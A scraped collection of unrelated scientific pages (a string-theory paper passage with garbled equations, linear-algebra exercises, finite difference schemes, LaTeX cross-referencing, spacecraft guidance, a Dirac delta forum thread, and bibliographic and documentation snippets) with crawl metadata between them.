Xpα0...αk=(Q−d)Ξpα0...αk+(δΞp)α0...αk(. (3.15) The operator acts on the insertions corresponding to the faces of one fewer codimension, (δΞp)α0...αk=k∑n=0(−1)nΞpα0...ˆαn...αk, (3.16) and all terms in (3.15) are evaluated at a common point on . Note that, schematically, gauge invariance requires that is annihilated by , and this follows from (3.15) because (Q−d−δ)(Q−d+δ)=(Q−d)2−δ2=0. (3.17) Since the physical amplitude is defined in the small Hilbert space, we know that the insertions must be independent of the zero mode: ηXpα0...αk=0. (3.18) From (3.15), we therefore learn that satisfies (Q−d)ηΞpα0...αk−(δηΞp)α0...αk=0. (3.19) Interestingly, this implies that the operator insertions given by define a gauge invariant amplitude. Since carries picture , it is natural to interpret as defining an amplitude with one fewer PCO insertion: ηΞpα0...αk=Xp−1α0...αk. (3.20) Thus we have the relation ⟨αp|η=⟨Ap−1|, (3.21) where is defined by insertions . We can apply this procedure again, relating to the amplitude containing two fewer PCO insertions, and continue all the way down until we have the amplitude where PCOs are absent. This leads to the following procedure for deriving gauge invariant amplitudes. The “insertions” defining an amplitude without PCOs can be trivially written X0α=1,      X0α0...αk=0   (k≥1). (3.22) The second equation says that there are no vertical corrections in the absence of PCOs. Since is independent of the zero mode, it can be expressed in -exact form: X0α0...αk=ηΞ1α0...αk. (3.23) The expression for is not unique, but let us assume that we have made some choice. We can then plug into (3.15) to derive an expression for the insertions defining the amplitude with a single PCO. By construction, will be independent of the zero mode and can be expressed in -exact form: X1α0...αk=ηΞ2α0...αk. (3.24) Substituting into (3.15) gives the insertions defining the amplitude with two PCOs. Continuing this process for steps we arrive at the insertions , as desired. The solution generated by this procedure is not unique. For most purposes it does not matter how the solution is chosen as long as the PCO insertions in the final amplitude avoid spurious poles. As we will demonstrate later, Sen and Witten give a class of solutions for the vertical corrections which can be generated by this procedure, but not the most general solution. ### 3.2 Examples Let us give some examples to see what the vertical corrections look like. Consider first an amplitude containing one PCO. We must find a set of insertions satisfying X0α0...αk=ηΞ1α0...αk. (3.25) We can choose for example Ξ1α=ξ(y1α(m)),           Ξ1α0...αk=0   (k≥1), (3.26) where gives the location of a insertion on the Riemann surface as a function of in each polyhedron. We may determine the insertions by substituting into (3.15): X1α =(Q−d)Ξ1α X1αβ =(Q−d)Ξ1αβ+Ξ1β−Ξ1α X1αβγ =(Q−d)Ξ1αβγ+Ξ1βγ−Ξ1αγ+Ξ1αβ (3.27) ⋮  . This gives X1α =X(y1α)−dξ(y1α) X1αβ =ξ(y1β)−ξ(y1α) X1αβγ =0 (3.28) ⋮  . The vertical corrections on the faces of codimension 2 and higher vanish. Here and in later equations we will not explicitly indicate the dependence of the fiber coordinates on the moduli, unless needed for clarity. As expected, is the pullback of the superstring measure (2.40) onto a local section of defined by . The insertions have a simple interpretation in terms of vertical integration. Let us make a brief detour to spell out what this means in the current setup. Let denote the local section of defined on each face of the dual triangulation. Let denote submanifolds of —the “vertical segments”—which, with a suitable orientation, connect the local sections to form a closed integration cycle in . We assume that the orientation of is antisymmetric in the indices, and postulate that the projection from down to the moduli space maps the vertical segments down to the faces of the dual triangulation. This implies that the vertical segments can be parameterized by coordinates on together with coordinates tangent to the fiber. The basic idea is to express the amplitude as ⟨Ap|=∑α∫Mα⟨Ω,Xp|+12!∑α,β∫Mαβ⟨Ω,Xp|+13!∑α,β,γ∫Mαβγ⟨Ω,Xp|+... , (3.29) where in each term we take the pullback of the superstring measure (2.40) on the corresponding submanifold of . If we integrate out the fiber coordinates on the vertical segments, this gives an expression for the amplitude as postulated in (3.8). We can work this out fairly easily in the case where there is only one PCO. Let us choose a coordinate system on corresponding to coordinates on together with an additional coordinate parameterizing the fiber direction. The submanifold is defined by specifying the fiber coordinate as a function of and . Since must join the local sections and , we require that y1(m,t)|t=1=y1β(m),   y1(m,t)|t=0=y1α(m). (3.30) We then find ∫Mαβ⟨Ω,X1| =∫Mαβ∫t ⟨Ω,X(y1(m,t))−dξ(y1(m,t))| (3.31) =∫Mαβ∫10dtddt⟨Ω,ξ(y1(m,t))| =∫Mαβ⟨Ω,ξ(y1β(m))−ξ(y1α(m))| =∫Mαβ⟨Ω,X1αβ|. The only part of the measure with the 1-form is a total derivative with respect to , and integrating out the fiber coordinate gives (3.2). Note that, in this case, the vertical correction only depends on the boundary of , not on how is chosen in the interior. This is a special occurrence since we are dealing with only one PCO. With more PCOs, the part of the measure proportional to is not a total derivative, and generally the vertical corrections will depend on the choice of vertical segments. This ambiguity corresponds in the algebraic formalism to the different possible ways of expressing an amplitude in exact form. Let us continue to the case of two PCOs. We must find a set of insertions satisfying X1α0...αk=ηΞ2α0...αk. (3.32) We can find a solution by multiplying by an insertion of : Ξ2α =ξ(y2α(m))[X(y1α(m))−dξ(y1α(m))] Ξ2αβ =ξ(y2αβ(m))[ξ(y1β(m))−ξ(y1α(m))] Ξ2αβγ =0 (3.33) ⋮  . Here gives the location of a new insertion on the codimension 0 faces as a function of , and gives the location of a
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.984817385673523, "perplexity": 530.8420530114815}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046153814.37/warc/CC-MAIN-20210729011903-20210729041903-00167.warc.gz"}
https://brainmass.com/math/linear-transformation/linear-mapping-linear-space-differentiability-continuity-50484
Explore BrainMass # Linear Mapping, Linear Space, Differentiability and Continuity Not what you're looking for? Search our solutions OR ask your own Custom question. This content was COPIED from BrainMass.com - View the original, and get the already-completed solution here! In each of Exercises 40 through 46 following, a linear space V is given and a mapping T : V&#8594;V is defined as indicated. In each case determine whether T is a linear mapping. If T is linear, determine the kernel (or null space) and range, and compute the dimension of each of these subspaces wherever they are finite-dimensional. 40. V is the (real) linear space of all real polynomials p on R. If p E V, then T(p) is defined by setting T(p)(x) = p(x+1), x E R 41. V is the linear space of all real functions f defined and differentiable on the open interval (0,1). If f E V, then T(f) is defined by setting T(f)(x) = xf'(x), x E (0,1) 42. V is the linear space of all real functions f defined and continuous on the closed interval [0, 2&#960;]. If f E V, then T(f) is defined by setting T(f)(x) = 0&#8747;2&#960;f(t)sin(x-t)dt, x E [0, 2&#960;] 43. V is the linear space of all real functions f defined and continuous on the closed interval [0, 2&#960;]. If f E V, then T(f) is defined by setting T(f)(x) = 0&#8747;2&#960;f(t)cos(x-t)dt, x E [0, 2&#960;] --- (See attached file for full problem description with accurate equations)
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.876526951789856, "perplexity": 987.5841346799222}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764495012.84/warc/CC-MAIN-20230127195946-20230127225946-00038.warc.gz"}
https://ccrma.stanford.edu/~bilbao/master/node206.html
Next: The Interpolated Rectilinear Scheme Up: Finite Difference Schemes for Previous: Finite Difference Schemes for ## The Rectilinear Scheme The finite difference scheme corresponding to a rectilinear mesh is obtained by applying centered differences to the wave equation, over a rectangular grid with indices and (which refer to points with spatial coordinates and ). The difference scheme, given originally as (4.53) is (A.14) and the amplification polynomial equation is of the form (A.5), with for . From (A.7), we thus have and we have Condition (A.8) is thus satisfied, and condition (A.9) gives the bound for stability which implies that the amplification factor for such values of . Because , this bound is the same as the bound for passivity of the associated mesh scheme, given in (4.63). The amplification factors, however, are distinct at all spatial frequencies only for . If , then the factors are degenerate for , and for and we are then in the situation discussed in §A.1.2 where linear growth of the solution may occur. This is an important special case, because it corresponds to the standard finite difference scheme for the rectilinear waveguide mesh (i.e., the realization without self-loops). The waveguide mesh implementation does not allow such growth at these frequencies. As far as assessing the computational requirements of the finite difference scheme, first consider the case . Five adds are required at each grid point in order to update. Given that , we can write the computational and add densities for the scheme as for For , however, scheme (A.13) simplifies to (A.15) which may be operated on alternating grids, i.e., need only be calculated for even (or odd). The computational and add densities, for are then for where we note that the reduced scheme (A.14) requires only four adds for updating at a given grid point; in addition, the multiplies by may be accomplished, in a fixed-point implementation, by simple bit-shifting operations. The increased efficiency of this scheme must be weighed against the danger of instability, and the fact that because grid density is reduced, the scheme is now applicable over a smaller range of spatial frequencies. The numerical phase velocities of the schemes, at the stability limit, and away from it, at , are plotted in Figure A.1. It is interesting to note that away from the stability limit, the numerical dispersion is somewhat less directionally-dependent; this important factor may be useful from the point of view of frequency-warping techniques [157] which may be used to reduce numerical dispersion effects for schemes which are relatively directionally-independent. This idea has been discussed in the waveguide mesh context (where self-loops will be present) in [175]. Next: The Interpolated Rectilinear Scheme Up: Finite Difference Schemes for Previous: Finite Difference Schemes for Stefan Bilbao 2002-01-22
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9848318696022034, "perplexity": 850.0237699127686}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-18/segments/1461860116173.76/warc/CC-MAIN-20160428161516-00098-ip-10-239-7-51.ec2.internal.warc.gz"}
http://tex.stackexchange.com/questions/43985/how-to-cross-reference-a-section-and-item-in-a-list-in-single-document?answertab=oldest
How to cross reference a section and item in a list in single document? I want to cross reference sections as well as some items in the list in my document. for ex: \label helps us to cross reference the sections. If we renew the command to provide the cross reference for any item in an item, then its not available for section reference. But how can we do both in a single document? - There is no difference in using \label-\ref when it comes to sectioning commands or enumerated lists. Here is an example showing how to properly use it: \documentclass{article} \begin{document} \section{A section}\label{sec:label} Here is some text. \begin{enumerate} \item An item \item Another item \label{enum:label} \end{enumerate} Reference to section~\ref{sec:label} and item~\ref{enum:label}. \end{document}​​​ For more advanced (even automated) enumerated list labelling/referencing, you can use the label and ref options to enumerate provided by the enumitem package. - how about custom lists like starlist(*) or bulletlist? –  volatNumbers Feb 9 '12 at 18:33 @volatNumbers: For "custom lists" you would need to include a minimal working example (MWE), since there may be many variables at play. Note that referencing requires a counter. If you have no counter, for the reference, you have to do something different. –  Werner Feb 9 '12 at 18:38 @Werner: It would be possible to refer to the page where the label is placed, p.~\pageref{customlist:label} (with \phantomsection before the \label{customlist:label}, if hyperref is used) - depends on the wishes of the OP (you named it: MWE!). –  Stephen Feb 9 '12 at 18:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8433188199996948, "perplexity": 1909.4471347640274}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-32/segments/1438042981576.7/warc/CC-MAIN-20150728002301-00041-ip-10-236-191-2.ec2.internal.warc.gz"}
https://space.stackexchange.com/questions/31314/what-are-common-guidance-strategies-for-a-finite-orbital-maneuver
# What are common guidance strategies for a finite orbital maneuver? Suppose we have our spacecraft in a circular orbit around the Moon and we want to transfer it to an elliptic orbit with a medium-thrust (10-100N) retrograde burn. Based on the current state estimate, we want to determine a propellant-optimal steering strategy to achieve the transfer. The thrusters operate at full throttle when they're activated, and thrust levels decline with propellant consumption (the propulsion system operates in blow-down mode). It seems to me that it is best to consider such a problem as a two-point boundary value problem, with the initial and final state vector given by some set of non-singular orbital elements (such as the equinoctial elements), and the dynamics given by some accordingly modified form of the Gauss planetary equations. Are there any standard and/or proven methods to solve this problem in real-time, aboard the spacecraft? Or are there other common guidance strategies that are better recommended? The requirement of solving this particular guidance problem in real-time on-board the spacecraft is really exigent. As far as I know the usual thing to do is solve the guidance problem on Earth and then uplink it to the spacecraft. Maybe the spacecraft control, understanding control as the ability of the spacecraft to follow the desired path in the presence of disturbances, can be autonomous by some sort of feedback law, MPC or event control. But maybe not because the dynamics are so slow and it may be more simple to manage control from Earth. Anyway when facing such problems I barely always find direct methods much easier and intuitive to employ rather than the indirect TBVP's. The key idea of direct methods is first discretize and then optimize whereas indirect ones do in opposite order. A good book is "Spacecraft Trajectory Optimization" written by Bruce A.Conway. • Thanks for your response. In Falck et al. (2014) (arc.aiaa.org/doi/10.2514/6.2014-3714), two closed-loop guidance algorithms for low-thrust vehicles are described and compared. Can't these be used to solve the guidance problem in real-time? Or do I understand their working incorrectly? – woeterb Oct 15 '18 at 9:29 • Taking a glance at this paper, what I see is that it can be implemented in real-time because it employs sub-optimal laws with analytical expressions. If you can find a form to solve your problem analytically, or at most requiring an optimizer to solve a LP or QP with a moderate number of parameters, then ok. – Julio Oct 15 '18 at 12:43
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.830216109752655, "perplexity": 675.7332970744455}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439735963.64/warc/CC-MAIN-20200805153603-20200805183603-00190.warc.gz"}
https://www.physicsforums.com/threads/quick-question-on-the-dirac-delta-function.219072/
# Quick Question on the Dirac Delta Function 1. Mar 1, 2008 ### G01 The Dirac delta function, $$\delta (x)$$ has the property that: (1) $$\int_{-\infty}^{+\infty} f(x) \delta (x) dx = f(0)$$ Will this same effect happen for the following bounds on the integral: (2) $$\int_{0}^{+\infty} f(x) \delta (x) dx = f(0)$$ My intuition tells me that it should, but the fact that the peak of the delta function lies on one of the bounds makes me think I should double check my reasoning. So, does anyone know if (2) above is correct? Thanks for any advice you can offer. Last edited: Mar 1, 2008 2. Mar 1, 2008 ### Vid According to mathematica integral from 0 to infinity and the integral from negative infinity to 0 are equal to f(0)/2. 3. Mar 1, 2008 ### jostpuur I think I've seen sometimes integration limits like this $$\lim_{\epsilon\to 0^+}\int\limits_{0-\epsilon}^{\infty}$$ to avoid this problem, which suggests that there probably is not very simple answer to the question. For example $$\lim_{n\to\infty} \int\limits_0^{\infty} f(x) \sqrt{\frac{n}{\pi}}e^{-nx^2} dx = \frac{1}{2}f(0)$$ but suppose you modify the kernel like this $$\sqrt{\frac{n}{\pi}} e^{-n(x-x_0(n))^2}$$ where $x_0:\mathbb{N}\to\mathbb{R}$ is some sequence such that $x_0(n)\to 0$ as $n\to\infty$. That still behaves as a delta function if the zero is contained in an open integration interval, but if the zero is on the boundary of the integration interval, the answer could be anything, depending on the chosen $x_0$. 4. Mar 1, 2008 ### tiny-tim $$\delta (x)$$ isn't really a function. It only has meaning inside $$\int_{-\infty}^{+\infty} f(x) \delta (x) dx$$. When it is on its own as part of a calculation, that is because it will be put inside such an integral in the next step of the calculation. This is because it is a symbol which is defined by the property $$\int_{-\infty}^{+\infty} f(x) \delta (x) dx = f(0)$$ Inside $$\int_{0}^{+\infty} f(x) \delta (x) dx$$ , it's a symbol without any meaning. (Though of course, you can write $$\int_{-\infty}^{+\infty} \theta (x) f(x) \delta (x) dx$$, which looks pretty similar.) 5. Mar 3, 2008 ### Rainbow Child The answer comes by joining the posts of jostpuur and tiny-tim. The second integral is $$I=\int_{0}^{+\infty} f(x) \delta (x) dx = \int_{-\infty}^{+\infty} \theta (x) f(x) \delta (x) dx$$ where $\theta(x)$ is the step function. Thus $I$ equals $$I=\theta(0)\,f(0)[/itex] and the question now is what's the definition of the step function. The one which is most commonly used is that $\theta(0)=\frac{1}{2}$, thus [tex]I=\frac{1}{2}\,f(0)$$ 6. Mar 3, 2008 ### jostpuur This doesn't fully make sense. If f is a function, then $$\int\limits_0^{\infty} f(x) dx = \int\limits_{-\infty}^{\infty} \theta(x)f(x) dx$$ is true with arbitrary value $\theta(0)$. Why should the $\theta(0)=1/2$ be chosen when there is $f(x)\delta(x)$ in the integrand instead? I think the original question is of similar nature as the question about what 0/0 is supposed to be. As I showed in my first response, if you try to approach this integral with some limits, you can get different results with different ways of taking the limit. Thus, we say that the limits cannot be used to give proper meaning for the this integral. 7. Mar 3, 2008 Because when the integrand contains a Dirac delta, it is not a function, and so the condition "if f is a function" does not apply. Well, it's more like asking what half of infinity is. But, yeah, to make Dirac deltas at all consistent (let alone rigorous), you need to enforce a definition of them as a limit of some sequence of well-defined functions. As you demonstrated, which exact sequence you choose will affect the answers you get if you ask questions like the one in this thread. That said, most people who are that concerned about consistency forgo the Dirac delta entirely and instead use distributions. The rest of us just live with the fact that certain operations (again, like the OP) aren't defined. 8. Mar 3, 2008 ### jostpuur I'll be more explicit! Consider the sequence of following functions $$\delta_{n,1}(x) = \sqrt{\frac{n}{\pi}} \exp\big(-n(x-n^{-1/4})^2\big) = \sqrt{\frac{n}{\pi}} \exp\big(-(\sqrt{n}x -n^{1/4})^2\big)$$ It is easy to believe, that the distributions, represented by these functions, converge towards the delta distribution, because this is just the usual Gaussian peak representation, but displaced slightly. Let a and b be such that $a\leq 0 < b$. Let us calculate the next integral. $$\lim_{n\to\infty}\int\limits_a^b f(x)\delta_{n,1}(x) dx = \lim_{n\to\infty} \sqrt{\frac{n}{\pi}} \int\limits_a^b f(x)\exp\big(-(\sqrt{n}x-n^{1/4})^2\big) dx = \lim_{n\to\infty} \frac{1}{\sqrt{\pi}} \int\limits_{\sqrt{n}a-n^{1/4}}^{\sqrt{n}b-n^{1/4}} f\big(\frac{y}{\sqrt{n}} + n^{-1/4}\big) e^{-y^2} dy$$ $$= \frac{1}{\sqrt{\pi}} \int\limits_{-\infty}^{\infty} f(0) e^{-y^2} dy = f(0)$$ However, notice that this is indeed true even with a=0. If we instead chose the sequence $$\delta_{n,2}(x) = \sqrt{\frac{n}{\pi}} e^{-nx^2}$$ we would have $$\lim_{n\to\infty} \int\limits_a^b f(x)\delta_{n,2}(x) dx = f(0),\quad\quad a<0<b$$ and $$\lim_{n\to\infty} \int\limits_a^b f(x)\delta_{n,2}(x) dx = \frac{1}{2}f(0),\quad\quad a=0<b.$$ This means, that the distributions, represented by functions $\delta_{n,1}$ and $\delta_{n,2}$, converge towards the same delta distribution. This is so, because if you want to calculate $$\int\limits_a^b f(x)\delta(x) dx,\quad\quad a<0<b$$ you can choose either of these sequences, and they give the same result. But when you calculate $$\int\limits_0^b f(x)\delta(x) dx,$$ choosing different representations for the delta distribution, you get different numbers out of the integral. Thus, the delta distribution does not contain enough information to calculate this integral. Last edited: Mar 3, 2008 9. Mar 3, 2008 ### jostpuur I was not applying any function assumption to any calculation with distributions. I merely noted, that with integrals of functions, the value of $\theta(0)$ does not matter, and then asked that why should some specific value for it be chosen when we integrate distributions. Not precisely true. Distributions can be defined without sequences of functions, but the sequences of functions still remain as an important way to handle distributions. Yes. This was my point. I explained it even more explicitly in my last post #8. 10. Mar 4, 2008 ### tiny-tim The endearing quality of distributions Because that's how distributions are defined, and what they were created for! It is distributions' most endearing (and, in my opinion, only endearing ) quality. 11. Mar 4, 2008 ### arildno Not at all. Let F be some function space over R, I some open interval in R, and define the functional D as follows: $$D(f,I)=f(0), 0\in{I},f\in{F},D(f,I)=0,0\notin{I},f\in{F}$$ This is the delta functional, and it can be shown to be linear, i.e, a distribution. This is how you rigorously define the Dirac Delta "function". 12. Mar 4, 2008 ### Rainbow Child But that's the whole point! $\delta(x)$ is a distribution thus it does not behaves like ordinary functions. Your point of view is that the integral does not exist, because it can take multiple values, but I say that it can be defined if you choose the value of $\theta(0)$ yielding to $$I=\int\limits_0^{\infty} f(x)\,\delta(x) dx = \theta(0)\,f(x)$$ 13. Mar 4, 2008 ### jostpuur When you choose the value for theta(0), in effect you are choosing the value of the entire integral. The number, that is supposed to come out of the integral, is not something that should be chosen. It should come out from some calculation. Right now the calculations don't give a unique number, and I don't feel like choosing some unique number by force would be a very good way to deal with this. Similar Discussions: Quick Question on the Dirac Delta Function
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9586115479469299, "perplexity": 461.92220268549374}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128319912.4/warc/CC-MAIN-20170622220117-20170623000117-00398.warc.gz"}
https://projecteuclid.org/euclid.aoms/1177697827
## The Annals of Mathematical Statistics ### Domains of Optimality of Tests in Simple Random Sampling David K. Hildebrand #### Abstract This paper deals with the structure of sets $\Omega$ of distributions for which a particular test is the most powerful for testing a simple hypothesis $H:f = f_0 \operatorname{vs.} K:f \varepsilon\Omega$, that is, with the domain of optimality of a test. The context is restricted to these $\Omega$ consisting of probabilities having continuous positive densities, and to one-sample tests. The important concept is that of a family of tests, one for each significance level. This concept allows us to use the full power of the Neyman-Pearson Lemma. The main results are: (1) The domain of optimality of a test family $\Phi$ is essentially a multiplicatively-convex (convex in the logarithms) cone; hence there are distributions both "near to" and "far from" the null distribution for which $\Phi$ is optimal. (Theorems 1, 2, and 3). (2) If $\Phi$ is uniformly most powerful for testing $H:f = f_0 \operatorname{vs.} K:f \varepsilon\Omega$ with $n \geqq 2$ then the class of distributions has a monotone likelihood ratio. (Theorem 4). #### Article information Source Ann. Math. Statist., Volume 40, Number 1 (1969), 308-312. Dates First available in Project Euclid: 27 April 2007 https://projecteuclid.org/euclid.aoms/1177697827 Digital Object Identifier doi:10.1214/aoms/1177697827 Mathematical Reviews number (MathSciNet) MR242308 Zentralblatt MATH identifier 0177.22804 JSTOR
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7067896127700806, "perplexity": 693.6393309000165}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496668765.35/warc/CC-MAIN-20191116204950-20191116232950-00150.warc.gz"}
https://edoc.unibas.ch/10107/
Ubiquitous mechanisms of energy dissipation in noncontact atomic force microscopy Ghasemi, S. Alireza and Goedecker, Stefan and Baratoff, Alexis and Lenosky, Thomas and Meyer, Ernst and Hug, Hans J.. (2008) Ubiquitous mechanisms of energy dissipation in noncontact atomic force microscopy. Physical review letters, Vol. 100, H. 23 , 236106, 4 S.. Full text not available from this repository. Official URL: http://edoc.unibas.ch/dok/A5262101
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8857088685035706, "perplexity": 29659.208025610325}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178385378.96/warc/CC-MAIN-20210308143535-20210308173535-00129.warc.gz"}
https://docs.plasmapy.org/en/latest/formulary/relativity.html
# Relativistic functions (plasmapy.formulary.relativity)¶ Functionality for calculating relativistic quantities ($$v \to c$$). ## Functions¶ Lorentz_factor(V) Return the Lorentz factor. relativistic_energy(m, v) Calculate the relativistic energy (in Joules) of an object of mass m and velocity v.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9715425372123718, "perplexity": 4345.748839635387}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400201826.20/warc/CC-MAIN-20200921143722-20200921173722-00277.warc.gz"}
https://worldwidescience.org/topicpages/t/tubulovesicular+extensions+cytonemes.html
